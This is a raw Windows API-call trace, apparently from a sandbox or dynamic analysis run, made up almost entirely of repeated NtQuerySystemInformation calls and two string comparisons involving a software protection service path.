[0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.407] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.419] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe8c0, Length=0x40, ResultLength=0x0) [0228.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc70, Length=0x28, ResultLength=0x0) [0228.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb90, Length=0x20, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 